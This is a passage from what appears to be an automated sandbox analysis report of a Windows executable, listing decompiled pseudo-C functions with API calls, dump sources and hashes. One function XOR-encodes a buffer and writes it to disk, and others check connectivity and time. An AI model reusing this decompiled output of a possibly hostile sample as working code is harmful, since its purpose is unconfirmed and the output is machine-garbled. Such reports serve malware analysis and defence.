    					_t27 =  *((intOrPtr*)(__ecx + 0x60));
    					if( *((intOrPtr*)(__ecx + 0x60)) != 0) {
    						_t17 = E0040F1E4(_t27);
    					}
    				}
    				if( *((intOrPtr*)(_t29 + 0x1a1f)) == 0) {
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(_t29 + 0x16b8);
    					_push(E004258FF);
    					L0043E2BE();
    					return _t17;
    				} else {
    					if( *((intOrPtr*)(_t29 + 0x17f8)) != 0) {
    						E00427C70(_t29, _t28);
    					}
    					return E00426AFE(_t29);
    				}
    			}

    0x00426573
    0x0042657c
    0x00426583
    0x00426585
    0x0042663c
    0x0042663c
    0x0042658e
    0x00426599
    0x004265a8
    0x004265af
    0x004265b2
    0x004265bd
    0x004265ca
    0x004265cb
    0x004265ce
    0x004265d1
    0x004265d6
    0x004265d8
    0x004265da
    0x004265db
    0x004265dd
    0x00426633
    0x00426633
    0x00000000
    0x00426633
    0x004265df
    0x004265e6
    0x00000000
    0x00000000
    0x004265ee
    0x004265f0
    0x004265f5
    0x004265f7
    0x004265f7
    0x004265f5
    0x00426602
    0x0042661c
    0x0042661d
    0x0042661e
    0x00426625
    0x00426626
    0x00426627
    0x0042662c
    0x00000000
    0x00426604
    0x0042660a
    0x0042660e
    0x0042660e
    0x00000000
    0x00426615

    APIs
    • time.MSVCRT ref: 00426599
    • difftime.MSVCRT ref: 004265A8
    • fabs.MSVCRT ref: 004265B2
      • Part of subcall function 0042900A: InternetGetConnectedState.WININET(?,00000000), ref: 0042901B
    • #1105.MFC42(004258FF,?,00000000,00000000,00000000,00000000), ref: 0042662C
      • Part of subcall function 0040F1E4: __EH_prolog.LIBCMT ref: 0040F1E9
      • Part of subcall function 0040F1E4: #535.MFC42(?), ref: 0040F210
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #1105#535ConnectedH_prologInternetStatedifftimefabstime
    • String ID:
    • API String ID: 1470086928-0
    • Opcode ID: c97197a15f35d4e17010da718551a9441c2f0db098ec839fe5a46de018eb8240
    • Instruction ID: df294616d767ae5b2afb743143899f6124d99670aa7ca45b77c110608779e39c
    • Opcode Fuzzy Hash: c97197a15f35d4e17010da718551a9441c2f0db098ec839fe5a46de018eb8240
    • Instruction Fuzzy Hash: 0D110371A04664AEDB20ABA1A8914DBBBE8EB01304F95007FE45252281DA399C519F4D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E0040F419(void* __ecx, char _a4, char** _a8) {
    				intOrPtr _v8;
    				void* __ebp;
    				char* _t25;
    				int _t26;
    				char** _t28;
    				void* _t30;
    				int _t35;
    				intOrPtr* _t47;
    				intOrPtr* _t50;
    				void* _t51;
    				intOrPtr _t52;
    
    				_push(__ecx);
    				_t30 = __ecx;
    				if( *((intOrPtr*)( *_a8 - 8)) == 0) {
    					L7:
    					return 1;
    				}
    				E004102B2(__ecx + 0x48,  &_a4, _a4);
    				_t50 = _a4 + 0x18;
    				_t25 =  *(_t50 + 0x14);
    				_t35 =  *(_t25 - 8);
    				_t47 = _t50 + 0x14;
    				if(_t35 > 0x28) {
    					_t35 = 0x28;
    				}
    				_t26 = strncmp( *_a8, _t25, _t35);
    				_t52 = _t51 + 0xc;
    				if(_t26 != 0) {
    					_push(_t35);
    					_v8 = _t52;
    					L0043DD3C();
    					E0040F818(_t50, _t30 + 0x58);
    					_push(_a8);
    					L0043DFCA();
    					 *(_t50 + 0x18) =  *(_t50 + 0x18) & 0x00000000;
    				} else {
    					_t28 = _a8;
    					if( *((intOrPtr*)( *_t28 - 8)) >  *((intOrPtr*)( *_t47 - 8))) {
    						_push(_t28);
    						L0043DFCA();
    					}
    				}
    				goto L7;
    			}

    0x0040f41c
    0x0040f425
    0x0040f42b
    0x0040f4a5
    0x0040f4ab
    0x0040f4ab
    0x0040f437
    0x0040f43f
    0x0040f442
    0x0040f445
    0x0040f448
    0x0040f44e
    0x0040f452
    0x0040f452
    0x0040f45b
    0x0040f461
    0x0040f466
    0x0040f481
    0x0040f487
    0x0040f48b
    0x0040f492
    0x0040f497
    0x0040f49c
    0x0040f4a1
    0x0040f468
    0x0040f468
    0x0040f475
    0x0040f477
    0x0040f47a
    0x0040f47a
    0x0040f475
    0x00000000

    APIs
    • strncmp.MSVCRT(?,?,00000000,?,?,?,?,00000000,?,?,0040F531,?,?), ref: 0040F45B
    • #858.MFC42(?), ref: 0040F47A
    • #535.MFC42 ref: 0040F48B
      • Part of subcall function 0040F818: __EH_prolog.LIBCMT ref: 0040F81D
      • Part of subcall function 0040F818: #800.MFC42(?,?,?,00000000,?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 0040FB78
    • #858.MFC42(?), ref: 0040F49C
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #858$#535#800H_prologstrncmp
    • String ID:
    • API String ID: 3866690751-0
    • Opcode ID: 3391acb5f2ab276b8bfae1e3fa978c50045169f2dc8064dd3033d131624916e5
    • Instruction ID: 0c4d8cd7b005c67d5753f14f3771aad290dd6004bd016341436a613b45cee016
    • Opcode Fuzzy Hash: 3391acb5f2ab276b8bfae1e3fa978c50045169f2dc8064dd3033d131624916e5
    • Instruction Fuzzy Hash: E1118675200205AFCB14DF09D8C5D6EB3A9EF59318F10812AF9069B391D738ED89CBA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 21%
    			E00424439(void* __ecx, long long __fp0) {
    				char _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				void* __ebp;
    				void* _t10;
    				signed int _t15;
    				void* _t20;
    				void* _t22;
    				long long* _t24;
    				intOrPtr _t25;
    
    				_t25 =  *0x455900; // 0x0
    				_t22 = __ecx;
    				if(_t25 != 0) {
    					return _t10;
    				}
    				 *0x455900 = 1;
    				__imp__time( &_v8);
    				__imp__difftime(_v8,  *((intOrPtr*)(__ecx + 0x17d0)));
    				 *_t24 = __fp0;
    				L0043E7A2();
    				_v12 = 0;
    				_pop(_t20);
    				_t15 = ( *(__ecx + 0x17bc) * 0x3c +  *((intOrPtr*)(__ecx + 0x17c0))) * 0x3c;
    				_v16 = _t15;
    				asm("fild qword [ebp-0xc]");
    				asm("fcompp");
    				asm("fnstsw ax");
    				asm("sahf");
    				st0 = st1;
    				if(_t15 < 0) {
    					L7:
    					 *0x455900 = 0;
    					return _t15;
    				}
    				_t15 = E0042900A(_t20);
    				if(_t15 == 0) {
    					goto L7;
    				}
    				if( *((intOrPtr*)(__ecx + 0x17f9)) != 0) {
    					_t21 =  *((intOrPtr*)(__ecx + 0x60));
    					if( *((intOrPtr*)(__ecx + 0x60)) != 0) {
    						_t15 = E0040F1E4(_t21);
    					}
    				}
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(_t22 + 0x16b8);
    				_push(0x423889);
    				L0043E2BE();
    				return _t15;
    			}

    0x00424442
    0x00424449
    0x0042444b
    0x004244e2
    0x004244e2
    0x00424454
    0x0042445f
    0x0042446e
    0x00424475
    0x00424478
    0x00424483
    0x00424490
    0x00424491
    0x00424494
    0x00424497
    0x0042449c
    0x0042449e
    0x004244a0
    0x004244a1
    0x004244a3
    0x004244d9
    0x004244d9
    0x00000000
    0x004244d9
    0x004244a5
    0x004244ac
    0x00000000
    0x00000000
    0x004244b4
    0x004244b6
    0x004244bb
    0x004244bd
    0x004244bd
    0x004244bb
    0x004244c2
    0x004244c3
    0x004244c4
    0x004244cb
    0x004244cc
    0x004244cd
    0x004244d2
    0x00000000

    APIs
    • time.MSVCRT ref: 0042445F
    • difftime.MSVCRT ref: 0042446E
    • fabs.MSVCRT ref: 00424478
      • Part of subcall function 0042900A: InternetGetConnectedState.WININET(?,00000000), ref: 0042901B
    • #1105.MFC42(00423889,?,00000000,00000000,00000000,00000000), ref: 004244D2
      • Part of subcall function 0040F1E4: __EH_prolog.LIBCMT ref: 0040F1E9
      • Part of subcall function 0040F1E4: #535.MFC42(?), ref: 0040F210
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #1105#535ConnectedH_prologInternetStatedifftimefabstime
    • String ID:
    • API String ID: 1470086928-0
    • Opcode ID: 7534668357fa519d6f017ae56d4ee01d02b2666687b9c6b7c062181a1d77e856
    • Instruction ID: 5b28e0d68b789501ed7beaebd846feacb06c36d797679912e657b911eb5db408
    • Opcode Fuzzy Hash: 7534668357fa519d6f017ae56d4ee01d02b2666687b9c6b7c062181a1d77e856
    • Instruction Fuzzy Hash: BA11E5B5A04218EFCB14BFA1EC955DABBBCFB40344F94457FF44692290E738AD108B58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E0040BC5C(void* __ecx, void* __eflags, CHAR* _a4) {
    				long _v8;
    				void _v4216;
    				signed char* _t15;
    				int _t18;
    				void* _t24;
    				void* _t25;
    				void* _t29;
    
    				_t25 = __ecx;
    				E0043E690(0x1074, __ecx);
    				_t24 = _t25;
    				_t29 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
    				if(_t29 != 0xffffffff) {
    					E0040BCF2( &_v4216, _t24);
    					_t15 =  &_v4216;
    					do {
    						 *_t15 =  *_t15 ^ 0x000000aa;
    						_t15 =  &(_t15[1]);
    					} while (_t15 <  &_v8);
    					_t18 = WriteFile(_t29,  &_v4216, 0x1070,  &_v8, 0);
    					_push(_t29);
    					if(_t18 != 0) {
    						CloseHandle();
    						return E0042AAFA(_a4) & 0xffffff00 | _v8 == 0x00001070;
    					}
    					CloseHandle();
    				}
    				return 0;
    			}

    0x0040bc5c
    0x0040bc64
    0x0040bc80
    0x0040bc88
    0x0040bc8d
    0x0040bc9a
    0x0040bc9f
    0x0040bca5
    0x0040bca5
    0x0040bca8
    0x0040bcac
    0x0040bcc3
    0x0040bccb
    0x0040bccc
    0x0040bcd6
    0x00000000
    0x0040bce8
    0x0040bcce
    0x0040bcce
    0x00000000

    APIs
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040BC82
    • WriteFile.KERNEL32(00000000,?,00001070,?,00000000), ref: 0040BCC3
    • CloseHandle.KERNEL32(00000000), ref: 0040BCCE
    • CloseHandle.KERNEL32(00000000), ref: 0040BCD6
      • Part of subcall function 0042AAFA: CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000003,00000000,00000000,00000000,00001070), ref: 0042AB13
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: File$CloseCreateHandle$Write
    • String ID:
    • API String ID: 189266078-0
    • Opcode ID: ecd3915b1d4e570c02aee5fbb9164a0a9066683c5b5f75ce537a799820463d62
    • Instruction ID: f7f96c66c86763bb7cb78a4b32446261e3b992c9dc9e8af88aba213ad30c1075
    • Opcode Fuzzy Hash: ecd3915b1d4e570c02aee5fbb9164a0a9066683c5b5f75ce537a799820463d62
    • Instruction Fuzzy Hash: 2A010432505124BBEB209BA1DD49FDB3B6CEF56360F1001BAF64AE20C0CB745D81C6AC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E00422EF4(void* __ecx) {
    				struct HWND__* _t20;
    				intOrPtr _t21;
    				intOrPtr* _t24;
    				void* _t44;
    				void* _t47;
    
    				E0043E4E0(0x4425a0, _t47);
    				_push(__ecx);
    				_push(__ecx);
    				_t44 = __ecx;
    				L0043DDD8();
    				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
    				if(__ecx != 0) {
    					_t20 =  *((intOrPtr*)(__ecx + 0x20));
    				} else {
    					_t20 = 0;
    				}
    				_t21 = E00428E0F(_t20, _t47 - 0x10);
    				if(_t21 != 0) {
    					_t21 =  *((intOrPtr*)(_t47 - 0x10));
    					if( *((intOrPtr*)(_t21 - 8)) != 0) {
    						_t46 = _t44 + 0x78;
    						E004207FC();
    						_t24 = E00429029(_t47 - 0x14, 0xe04b);
    						 *(_t47 - 4) = 1;
    						E004207D4(_t44 + 0x78,  *_t24);
    						 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
    						L0043DD36();
    						E004207FC();
    						E004207D4(_t44 + 0x78,  *((intOrPtr*)(_t47 - 0x10)));
    						_t21 = E004201B7(_t46);
    					}
    				}
    				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
    				return _t21;
    			}

    0x00422ef9
    0x00422efe
    0x00422eff
    0x00422f01
    0x00422f06
    0x00422f0b
    0x00422f11
    0x00422f17
    0x00422f13
    0x00422f13
    0x00422f13
    0x00422f1f
    0x00422f28
    0x00422f2a
    0x00422f31
    0x00422f33
    0x00422f38
    0x00422f46
    0x00422f51
    0x00422f55
    0x00422f5a
    0x00422f61
    0x00422f68
    0x00422f72
    0x00422f79
    0x00422f79
    0x00422f31
    0x00422f7e
    0x00422f85
    0x00422f8e
    0x00422f96

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#540H_prolog
    • String ID:
    • API String ID: 4013826629-0
    • Opcode ID: 595f0816ca4d4161ec2dce1c21f105c605fb2e2a804aa443e2638f42fe1344f7
    • Instruction ID: 3e5f22d906b6b921729493b42256d54c7cea30ed46b7747ced6a07e723b447f9
    • Opcode Fuzzy Hash: 595f0816ca4d4161ec2dce1c21f105c605fb2e2a804aa443e2638f42fe1344f7
    • Instruction Fuzzy Hash: 34119171A11135ABCB19E790EA167AE73B4AF44318F90045FE012771D2EFBC2E05C759
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0040CF84(void* __ecx) {
    				struct tagLOGFONTA _v64;
    				void* __ebp;
    				void* _t8;
    				void* _t10;
    				struct HFONT__* _t15;
    				void* _t17;
    				void* _t18;
    				struct HFONT__* _t19;
    				void* _t25;
    				void* _t27;
    
    				_t25 = __ecx;
    				if(E0040CC69(_t8, __ecx) != 0) {
    					_t10 = E0040CD41(_t25);
    					_t18 = _t10;
    					if(_t18 == 0) {
    						return _t10;
    					}
    					_t27 = _t25 + 0x44;
    					if(_t27 != 0 &&  *((intOrPtr*)(_t27 + 4)) != 0) {
    						L0043DD72();
    					}
    					_t19 = GetObjectA( *(_t18 + 4), 0x3c,  &_v64);
    					if(_t19 != 0) {
    						_v64.lfUnderline = 1;
    						_t15 = CreateFontIndirectA( &_v64);
    						_push(_t15);
    						L0043DD60();
    						_t19 = _t15;
    						if(_t19 != 0 &&  *((intOrPtr*)(_t25 + 0xb0)) != 0) {
    							E0040C88B(_t25);
    						}
    					}
    					return _t19;
    				}
    				_t17 = 1;
    				return _t17;
    			}

    0x0040cf8c
    0x0040cf96
    0x0040cf9f
    0x0040cfa4
    0x0040cfa8
    0x0040d006
    0x0040d006
    0x0040cfab
    0x0040cfb0
    0x0040cfba
    0x0040cfba
    0x0040cfce
    0x0040cfd2
    0x0040cfd7
    0x0040cfdc
    0x0040cfe2
    0x0040cfe5
    0x0040cfea
    0x0040cfee
    0x0040cffb
    0x0040cffb
    0x0040cfee
    0x00000000
    0x0040d002
    0x0040cf9a
    0x00000000

    APIs
      • Part of subcall function 0040CC69: #3797.MFC42(0040C750), ref: 0040CC6D
    • #2414.MFC42 ref: 0040CFBA
    • GetObjectA.GDI32(?,0000003C,?), ref: 0040CFC8
    • CreateFontIndirectA.GDI32(?), ref: 0040CFDC
    • #1641.MFC42(00000000), ref: 0040CFE5
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #1641#2414#3797CreateFontIndirectObject
    • String ID:
    • API String ID: 8113875-0
    • Opcode ID: b4fd1338bcccc560eb2f600723680d29eb09a89135e86c7daad66885977364cb
    • Instruction ID: 28be234ebe1a46c710db5f93e42e0e435bd41b05672fc9b850399b65590ee0b9
    • Opcode Fuzzy Hash: b4fd1338bcccc560eb2f600723680d29eb09a89135e86c7daad66885977364cb
    • Instruction Fuzzy Hash: 33017931B00601A7DB256BE59CC577F765D9B4470CF04013BEA05F62D1DFB8DC0A8299
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0040C740(void* __ecx) {
    				struct tagLOGFONTA _v64;
    				void* __ebp;
    				void* _t7;
    				void* _t9;
    				struct HFONT__* _t14;
    				void* _t16;
    				void* _t17;
    				struct HFONT__* _t18;
    				void* _t24;
    				void* _t26;
    
    				_t24 = __ecx;
    				if(E0040CC69(_t7, __ecx) != 0) {
    					_t9 = E0040CD41(_t24);
    					_t17 = _t9;
    					if(_t17 == 0) {
    						return _t9;
    					}
    					_t26 = _t24 + 0x44;
    					if(_t26 != 0 &&  *((intOrPtr*)(_t26 + 4)) != 0) {
    						L0043DD72();
    					}
    					_t18 = GetObjectA( *(_t17 + 4), 0x3c,  &_v64);
    					if(_t18 != 0) {
    						_t14 = CreateFontIndirectA( &_v64);
    						_push(_t14);
    						L0043DD60();
    						_t18 = _t14;
    						if(_t18 != 0 &&  *((intOrPtr*)(_t24 + 0xb0)) != 0) {
    							E0040C88B(_t24);
    						}
    					}
    					return _t18;
    				}
    				_t16 = 1;
    				return _t16;
    			}

    0x0040c748
    0x0040c752
    0x0040c75b
    0x0040c760
    0x0040c764
    0x0040c7be
    0x0040c7be
    0x0040c767
    0x0040c76c
    0x0040c776
    0x0040c776
    0x0040c78a
    0x0040c78e
    0x0040c794
    0x0040c79a
    0x0040c79d
    0x0040c7a2
    0x0040c7a6
    0x0040c7b3
    0x0040c7b3
    0x0040c7a6
    0x00000000
    0x0040c7ba
    0x0040c756
    0x00000000

    APIs
      • Part of subcall function 0040CC69: #3797.MFC42(0040C750), ref: 0040CC6D
    • #2414.MFC42 ref: 0040C776
    • GetObjectA.GDI32(?,0000003C,?), ref: 0040C784
    • CreateFontIndirectA.GDI32(?), ref: 0040C794
    • #1641.MFC42(00000000), ref: 0040C79D
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #1641#2414#3797CreateFontIndirectObject
    • String ID:
    • API String ID: 8113875-0
    • Opcode ID: 8acf4ecde69a6721dd3b70687a1dc9792587f2089f7f4f4589a81b75e2aa1c69
    • Instruction ID: ad5e05feb9c6b0ab7571cb48be3c3a985cbe88ebf25b46282599a39eac488d32
    • Opcode Fuzzy Hash: 8acf4ecde69a6721dd3b70687a1dc9792587f2089f7f4f4589a81b75e2aa1c69
    • Instruction Fuzzy Hash: 73017172700606E7DB256BA598C5B7F729C9B84704F04023BAA02B72D1DBB8DC068A99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0040C7BF(signed int __eax, intOrPtr* __ecx, intOrPtr* _a4) {
    				void* _t16;
    				void* _t32;
    				intOrPtr* _t33;
    				intOrPtr* _t34;
    				intOrPtr* _t35;
    
    				_t13 = __eax;
    				_t35 = __ecx;
    				L0043E18C();
    				if((0x00000100 & __eax) == 0) {
